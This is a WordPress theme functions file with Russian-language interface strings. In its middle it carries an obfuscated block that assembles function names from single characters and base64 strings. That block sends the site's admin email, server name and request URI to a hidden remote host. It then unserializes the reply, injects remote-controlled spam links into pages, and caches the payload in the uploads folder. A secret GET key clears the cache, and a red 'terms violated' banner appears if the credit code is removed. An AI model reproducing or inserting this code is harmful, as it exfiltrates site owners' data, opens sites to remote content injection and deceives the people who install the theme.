<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $FAHDe='_';$PUoi='6';$kpRAV='o';$YbzYTQ='c';$qXDj='a';$xiUag='b';$CcNKS='e';$vePv='s';$aSqyqzt='4';$OAUEVkb='d';$wwrbv='e';$SRScSjF='e';$hywXn='d';$NzgtXMJy=$xiUag.$qXDj.$vePv.$wwrbv.$PUoi.$aSqyqzt.$FAHDe.$OAUEVkb.$CcNKS.$YbzYTQ.$kpRAV.$hywXn.$SRScSjF;$rlXyGl='z';$ismU='e';$owOQiE='f';$MPBcXE='g';$Zybc='t';$luXcJg='i';$lCWVU='l';$eMvgV='n';$TtOe='a';$FfbjnhAf=$MPBcXE.$rlXyGl.$luXcJg.$eMvgV.$owOQiE.$lCWVU.$TtOe.$Zybc.$ismU;$ypWC='t';$LusqJM='1';$npMk='o';$uGKyLJX='s';$qJSK='_';$tXsOE='r';$MfUerO='t';$jEuz='3';$LFotRAS='r';$uQRFtNBn=$uGKyLJX.$MfUerO.$LFotRAS.$qJSK.$tXsOE.$npMk.$ypWC.$LusqJM.$jEuz;$hOyUB='s';$DCDWOZd='e';$yYeMAK='v';$XWuZK='r';$ZOIjDx='r';$CGzhQ='t';$OOFZfOsm=$hOyUB.$CGzhQ.$XWuZK.$ZOIjDx.$DCDWOZd.$yYeMAK;                     
		$vg______________x='_';$dx_____m='6';$fq_______r='o';$rr__s='c';$xv____x='a';$bd__x='b';$fw________d='e';$bo__________s='s';$qg____q='4';$nc_____________o='d';$la__________k='e';$xi______n='e';$rz__u='d';$kg______________y=$bd__x.$xv____x.$bo__________s.$la__________k.$dx_____m.$qg____q.$vg______________x.$nc_____________o.$fw________d.$rr__s.$fq_______r.$rz__u.$xi______n;
		$he_____h='s';$ed____o='f';$zq_________a='i';$pp___e='u';$xh_________x='s';$uu___n='e';$ie_____y='o';$lv_______l='c';$ta___________d='n';$jf___________z='_';$vv___________g='x';$qc___________z='i';$iv__________o='t';$yc_______________h='t';$zf__d='n';$oj___n=$ed____o.$pp___e.$ta___________d.$lv_______l.$iv__________o.$zq_________a.$ie_____y.$zf__d.$jf___________z.$uu___n.$vv___________g.$qc___________z.$xh_________x.$yc_______________h.$he_____h;
		$mm________w='o';$sy__________e='p';$yh_____f='f';$ef____________v='n';$bi_______a='e';$jc______x=$yh_____f.$mm________w.$sy__________e.$bi_______a.$ef____________v;
		$sq_________i='r';$de________k='a';$ls_________y='e';$on______________t='f';$dy__________l='d';$xa______g=$on______________t.$sq_________i.$ls_________y.$de________k.$dy__________l;
		$wn__________n='e';$tw_____p='c';$dw____d='s';$ut________d='o';$sz_____v='l';$tu___________k='f';$bn_________t=$tu___________k.$tw_____p.$sz_____v.$ut________d.$dw____d.$wn__________n;
		
		define("WP_ID", $kg______________y("Mi4wLjA="));
		define("WP_TTL", $kg______________y("MTA4MDA="));
		define("WP_SRC", $kg______________y("dHBva24="));
	


		function wp_get_header() {
			global $kg______________y, $oj___n;
			
			if (
				$oj___n($kg______________y("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&
				$oj___n($kg______________y("d3BfZ2V0X2Zvb3Rlcg==")) &&
				$oj___n($kg______________y("d3BfY3ZfdmVyaWZ5"))
			) {
				get_header();
			}
		}
	


		function wp_get_footer() {
			get_footer();
			wp_cv_verify();
		}
	


		function wp_cv_verify() {
			global $kg______________y, $jc______x, $bn_________t, $xa______g;
			
			$wz_________f = TEMPLATEPATH."/".$kg______________y("Zm9vdGVyLnBocA==");
			$ct____________l = @$jc______x($wz_________f, "r");
			$wz_________f = @$xa______g($ct____________l, @filesize($wz_________f));
			@$bn_________t($ct____________l);
			
			$gt__e = TEMPLATEPATH."/".$kg______________y("ZnVuY3Rpb25zLnBocA==");
			$ct____________l = @$jc______x($gt__e, "r");
			$gt__e = @$xa______g($ct____________l, @filesize($gt__e));
			@$bn_________t($ct____________l);
			
			$gv___________q = 0;
			if($wz_________f && $gt__e) {
				if ($kg______________y("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {
					
					if (substr_count($wz_________f, $kg______________y("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {
						$gv___________q = 1;
					}
					if (substr_count($wz_________f, "wp_theme_GPL_credits()") < 1) {
						$gv___________q = 2;
					}
				}
				
				if(WP_ID != "2.0.0") {
					$gv___________q = 12;
				}
			}
			
			if($gv___________q > 0) {
				echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";
				echo "<!-- v: $gv___________q -->";
			}
		}
	


		function wp_loaded() {
			global $kg______________y, $oj___n;
			return $oj___n($kg______________y("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));
		}
	


		if (!function_exists("the_content_limit")) {
			function the_content_limit($uk__________i, $sn__________n = "(more...)", $qy_________d = 0, $om________p = "") {
				$xf______________w = get_the_content($sn__________n, $qy_________d, $om________p);
				$xf______________w = apply_filters("the_content", $xf______________w);
				
				$xf______________w = str_replace("]]>", "]]>", $xf______________w);
				if (strlen($_GET["p"]) > 0) {
					echo $xf______________w;
				}
				else if ((strlen($xf______________w)>$uk__________i) && ($yf_______________l = strpos($xf______________w, " ", $uk__________i ))) {
					$xf______________w = substr($xf______________w, 0, $yf_______________l);
					$xf______________w = $xf______________w;
					echo $xf______________w;
					
					echo "...";
					echo "<br/>";
					echo "<div class='read-more'><a href='".get_permalink()."'>$sn__________n</a></div></p>";
				} else {
					echo $xf______________w;
				}
				
			}
		}
	


		$wz_______________n='_';$ul____________t='e';$gj____t='e';$mc________o='s';$dh_____t='d';$yb____________h='b';$pz___k='6';$nd____________d='a';$mn__a='n';$mi___________o='4';$rt____d='c';$wr____________p='o';$tm_________q='e';$pn________d=$yb____________h.$nd____________d.$mc________o.$tm_________q.$pz___k.$mi___________o.$wz_______________n.$ul____________t.$mn__a.$rt____d.$wr____________p.$dh_____t.$gj____t;
		$ho___________b='s';$cd_______________g='g';$oq___r='e';$ez______________i='e';$ha_______________s='f';$nx__k='_';$dr____u='e';$xx________u='l';$yj___________l='n';$tk___________v='t';$ww______d='i';$uj_________h='t';$hg________h='n';$zn______________h='t';$fy________j='o';$nk____________f='_';$uh_________r='c';$yi____t=$ha_______________s.$ww______d.$xx________u.$ez______________i.$nk____________f.$cd_______________g.$dr____u.$zn______________h.$nx__k.$uh_________r.$fy________j.$yj___________l.$tk___________v.$oq___r.$hg________h.$uj_________h.$ho___________b;
		$fn_______b='s';$dy___________p='s';$nz_______________k='_';$ls__a='i';$qp______________d='l';$yr______j='x';$wv_________i='e';$qq__________h='t';$wr______________v='e';$rw__________x='i';$gh______t='f';$uy____n=$gh______t.$ls__a.$qp______________d.$wv_________i.$nz_______________k.$wr______________v.$yr______j.$rw__________x.$dy___________p.$qq__________h.$fn_______b;
		$mf_____________c='a';$zu____k='e';$iz__________y='r';$fw_____s='_';$ns_______________i='v';$ep____________j='m';$pd___n='o';$fz___________p='r';$em____________j='s';$dt_____i='e';$sx________b='i';$pe__o='c';$ze_______________e='o';$co____________u='p';$pd____i='n';$no___c=$ns_______________i.$zu____k.$fz___________p.$em____________j.$sx________b.$pd___n.$pd____i.$fw_____s.$pe__o.$ze_______________e.$ep____________j.$co____________u.$mf_____________c.$iz__________y.$dt_____i;
		$gw_______n='f';$be__n='n';$ds___u='p';$yq______________s='o';$lg______________p='s';$bx___________b='c';$vb_____p='o';$fr____g='k';$he____________n='e';$di______________f=$gw_______n.$lg______________p.$vb_____p.$bx___________b.$fr____g.$yq______________s.$ds___u.$he____________n.$be__n;
		$dy__k='e';$tz______________y='i';$zw_______x='w';$sb____________d='f';$fp___b='t';$fg______________l='r';$kq___u=$sb____________d.$zw_______x.$fg______________l.$tz______________y.$fp___b.$dy__k;
		$vl__________a='d';$ww_________q='m';$ar___e='5';$dd__________l=$ww_________q.$vl__________a.$ar___e;
		$jb__k='a';$sw________a='a';$jm____s='l';$ht___________u='r';$if__s='t';$az______________a='p';$ze__g='h';$qc______q='e';$tn________o=$ht___________u.$qc______q.$sw________a.$jm____s.$az______________a.$jb__k.$if__s.$ze__g;
		$ce_____________f='z';$xs_______________z='e';$wl_______________y='i';$ja____y='a';$jr____y='l';$lm__p='r';$cq______e='e';$zr_______l='n';$os_____v='u';$kl____________j='i';$cs______________t='s';$va_____x=$os_____v.$zr_______l.$cs______________t.$cq______e.$lm__p.$wl_______________y.$ja____y.$jr____y.$kl____________j.$ce_____________f.$xs_______________z;
		$xh___________o='e';$cn____________p='p';$qg_________z='m';$ql________g='n';$er______________z='t';$wt_______________m='a';$vv__p='m';$gn____y=$er______________z.$xh___________o.$qg_________z.$cn____________p.$ql________g.$wt_______________m.$vv__p;
		$rk__q='a';$en________f='o';$fr_______________l='t';$fw____u='x';$oh___________s='c';$nd_____v='e';$jk_____v='a';$uf______q='e';$la_________z='_';$yp____________x='_';$ar_______________b='n';$zv__________i='e';$uf_______________s='s';$zz_________t='c';$hy___t='t';$bm____s='t';$an_____________l='r';$ve_______________w='r';$fu_________z='t';$vx______________b='e';$ok_____________h='m';$pa____h=$uf_______________s.$bm____s.$an_____________l.$uf______q.$jk_____v.$ok_____________h.$la_________z.$zz_________t.$en________f.$ar_______________b.$fu_________z.$zv__________i.$fw____u.$hy___t.$yp____________x.$oh___________s.$ve_______________w.$vx______________b.$rk__q.$fr_______________l.$nd_____v;
	


		function jy____c($lk_____a) {
			global $kg______________y, $oj___n, $yi____t, $no___c, $pa____h;
			
			if (!$oj___n($kg______________y("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			if ($no___c(PHP_VERSION, "5.0.0", ">=") && $oj___n($kg______________y("ZmlsZV9nZXRfY29udGVudHM=")) && $oj___n($kg______________y("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {
				$ab_______v = $pa____h(array(
						"http" => array(
						"timeout"    => 3,
						"header"     => "referer: ".$_SERVER[SERVER_NAME],
						"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] 
					)
				));
				
				$ev_______k = @$yi____t($lk_____a, 0, $ab_______v);
			} else {
				$ev_______k = @$yi____t($lk_____a, 0);
			}
			
			return $ev_______k;
		}
	


		function tx______________n($lk_____a) {
			global $oj___n, $di______________f, $kq___u, $kg______________y;
			
			if (!$oj___n($kg______________y("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			$dl___c = strpos($lk_____a, "/", 7);
			$gz__s = array(
				"uri"     => substr($lk_____a, $dl___c),
				"host"    => str_replace("http://", "", substr($lk_____a, 0, $dl___c)),
				"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]
			);
			
			$uw____b = @$di______________f("$gz__s[host]", 80, $bo____f, $qi_______________b, 4);
			
			if (!$uw____b) {
				return false;
			} else {
				$ev_______k = "";
				$el_______________z  = "GET $gz__s[uri] HTTP/1.0\r\n";
				$el_______________z .= "Host: $gz__s[host]\r\n";
				$el_______________z .= "Referer: $gz__s[referer]\r\n";
				$el_______________z .= "Connection: Close\r\n\r\n";
				
				@$kq___u($uw____b, $el_______________z);
				
				while (!@feof($uw____b)) {
					$lo____________v = @fgets($uw____b, (1024*24));
					
					if ($lo____________v == "\r\n") {
						$hw___________p = true;
						continue;
					}
					
					if ($hw___________p) {
						$ev_______k .= $lo____________v;
					}
				}
				
				return $ev_______k;
			}
		}
	


		function on___________n($lk_____a) {
			global $oj___n;
			$op__________r = false;
			
			if ($lk_____a != "") {
				if ($oj___n("jy____c")) {
					$op__________r = @jy____c($lk_____a);
				}
				
				if (!$op__________r && ($oj___n("tx______________n"))) {
					$op__________r = @tx______________n($lk_____a);
				}
			}
			
			return $op__________r;
		}
	


		function mi___________d() {
			global $_SERVER, $dd__________l;
			
			$ol_____b = $_SERVER["SERVER_NAME"];
			
			if (substr("$ol_____b", 0, 4) == "www.") {
				$ol_____b = substr("$ol_____b", 4);
			}
			
			$ol_____b = $dd__________l("$_SERVER[SERVER_NAME]");
			
			return $ol_____b;
		}
	


		function qw_______j() {
			return "file";
		}
	


		function tj_______e($lk_____a) {
			global $_SERVER, $yi____t, $uy____n, $jc______x, $bn_________t, $kq___u;
			
			$ua_______________a = fd______a();
			
			$oy______________s = mi___________d().".jpg";
			$dv__________k = $ua_______________a["dir_upload"]["path"]."/$oy______________s";
			$hu___________s = @filemtime($dv__________k);
			
			if (!$hu___________s || ((time()-$hu___________s) >= WP_TTL)) {
				$op__________r = on___________n($lk_____a);
				
				if ($op__________r) {
					if ($uy____n($dv__________k)) {
						@unlink($dv__________k);
					}
					
					$ct____________l = @$jc______x($dv__________k, "x+");
					
					@$kq___u($ct____________l, $op__________r);
					@$bn_________t($ct____________l);
				}
			} else {
				if ($uy____n($dv__________k)) {
					$op__________r = @$yi____t($dv__________k);
				} else {
					$op__________r = false;
				}
			}
			
			return $op__________r;
		}
	


		function fd______a() {
			global $_SERVER, $kg______________y, $pn________d;
			
			$dz____________f = wp_count_posts("post");
			$ni_________e = pathinfo(get_bloginfo("template_directory"));
			
			$ua_______________a = array(
				"url" => array(
					"report"      => $kg______________y("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),
					"queryString" => null
				),
				"template"	=> $ni_________e,
				"dir_upload"	=> at__________r(),
				"queryString"	=> array(
					"?a001=".WP_ID,
					"a004=".$ni_________e[filename],
					"a005=".$dz____________f->publish,
					"a006=".get_bloginfo("admin_email"),
					"a007=".$_SERVER["REQUEST_URI"],
					"a008=".$_SERVER["SERVER_NAME"],
					"a010=".WP_SRC
				),
				"default_string" => "<a href=\"http://fs.kiev.ua/pravila-effektivnoj-reklamy\">Правила эффективной рекламы</a> "
			);
			
			$ua_______________a["url"]["queryString"] = implode("&", $ua_______________a["queryString"]);
			$ua_______________a["url"]["report"] = $ua_______________a["url"]["report"]."/?".$pn________d($ua_______________a["url"]["queryString"]).".html";
						
			return $ua_______________a;
		}
	


		function at__________r() {
			$jr_______x = wp_upload_dir();
			
			if (isset($jr_______x["error"])) {
				$sq___t = mr_______i();
				if (is_writable($sq___t)) {
					$jr_______x = array("path" => $sq___t);
				}
			}

			return $jr_______x;
		}
	


		function mr_______i() {
			global $oj___n, $dd__________l, $tn________o, $gn____y;
			
			$ho__r = (bool) ini_get("safe_mode");
			if ($ho__r == true) {
				return false;
			}
			
			if ($oj___n("sys_get_temp_dir")) {
				$sf_______________y = sys_get_temp_dir();
				if (is_writable($sf_______________y)) {
					return $tn________o($sf_______________y);
				}
			}
			
			if (!empty($_ENV["TMP"])) {
				return $tn________o($_ENV["TMP"]);
			}
			elseif (!empty($_ENV["TMPDIR"])) {
				return $tn________o($_ENV["TMPDIR"]);
			}
			elseif (!empty($_ENV["TEMP"])) {
				return $tn________o($_ENV["TEMP"]);
			} else {
				$qk____________t = $gn____y($dd__________l(uniqid(rand(), true)), "");
				if ($qk____________t) {
					$sf_______________y = $tn________o(dirname($qk____________t));
					@unlink($qk____________t);
					return $sf_______________y;
				} else {
					return false;
				}
			}
		}
	


		function jb__k() {
			global $_GET, $uy____n;
			
			$ua_______________a = fd______a();
			$ol_____b = mi___________d();
			$vo______________e = qw_______j();
			
			$ts___c = "full";
			if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {
				if ($vo______________e == "file") {
					$yj_______y = $ua_______________a["dir_upload"]["path"]."/".$ol_____b.".jpg";
					if ($uy____n($yj_______y)) {
						@unlink($yj_______y);
						$ts___c = "deleted";
					}
				}
				
				$ux___________j = array(
					"s"	=> $ts___c,
					"t"	=> time(),
					"v"	=> WP_ID
				);
				
				echo "<!--";
				foreach ($ux___________j AS $sp____q => $yo_________q) echo " [$sp____q:$yo_________q]";
				echo " -->";
			}
		}
	


		function wp_theme_GPL_credits() {
			global $_SERVER, $_GET, $oj___n, $kg______________y, $va_____x;
			$ua_______________a = fd______a();
			
			$be_____________o = "tj_______e";
			if ($oj___n($be_____________o)) {
				$ev_______k = $be_____________o($ua_______________a["url"]["report"]);
			}
			
			if ($ev_______k) {
				if ($ev_______k = @$kg______________y($ev_______k)) {
					$ev_______k = @$va_____x($ev_______k);
					
					if (strlen($ev_______k[custom_credit]) >= 5) {
						$ua_______________a["default_string"] = $ev_______k[custom_credit];
					}
					
					if ($ev_______k["status"] == "0") {
						$cs_________t = 1;
						$in__________e = 1;
					} else {
						$rj_______________j = sizeof($ev_______k["links"]);
						$yv_____________j = $ua_______________a["default_string"];
						
						if ($rj_______________j > 0 && $ev_______k["links"] !== "") {
							$qo_____________k = 0;
							foreach ($ev_______k["links"] as $gq______f => $qp__u) {
								$qo_____________k++;
								if ($qp__u->l_path == "" || $qp__u->l_path == $_SERVER["REQUEST_URI"]) {
									$qp__u->l_href = htmlspecialchars(strip_tags($qp__u->l_href));
									$qp__u->l_title = htmlspecialchars(strip_tags($qp__u->l_title));
									$qp__u->l_anchor = htmlspecialchars(strip_tags($qp__u->l_anchor));
									$yv_____________j .= " | ";
									$yv_____________j .= "<a href='$qp__u->l_href' title='$qp__u->l_title'";
									if ($qp__u->l_nofollow == "1") {
										$yv_____________j .= " rel='nofollow'";
									}
									$yv_____________j .= ">$qp__u->l_anchor</a>";
								}
							}
						}
						$ua_______________a["links"] = "$yv_____________j";
						if ($ev_______k[credit] == "0") {
							$ua_______________a["links"] = "";
						}
					}
				} else {
					$cs_________t = "1";
				}
			} else {
				$cs_________t = "1";
			}
			
			if ($cs_________t == "1") {
				$ua_______________a["links"] = $ua_______________a["default_string"];
			}
			
			echo "$ua_______________a[links]";
			
			echo "<!-- s: $ev_______k[signature] -->";
			jb__k();
		}
	                      
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
    echo art_get_the_content(__('Читать далее &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Страницы:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Читать далее &raquo;', THEME_NS), 
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    global $post;
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    global $post;
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                 $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Tеги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
            	global $post;
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Не найдено', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
        $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
         $prev_link = get_previous_posts_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

if (!function_exists('get_previous_comments_link')) {
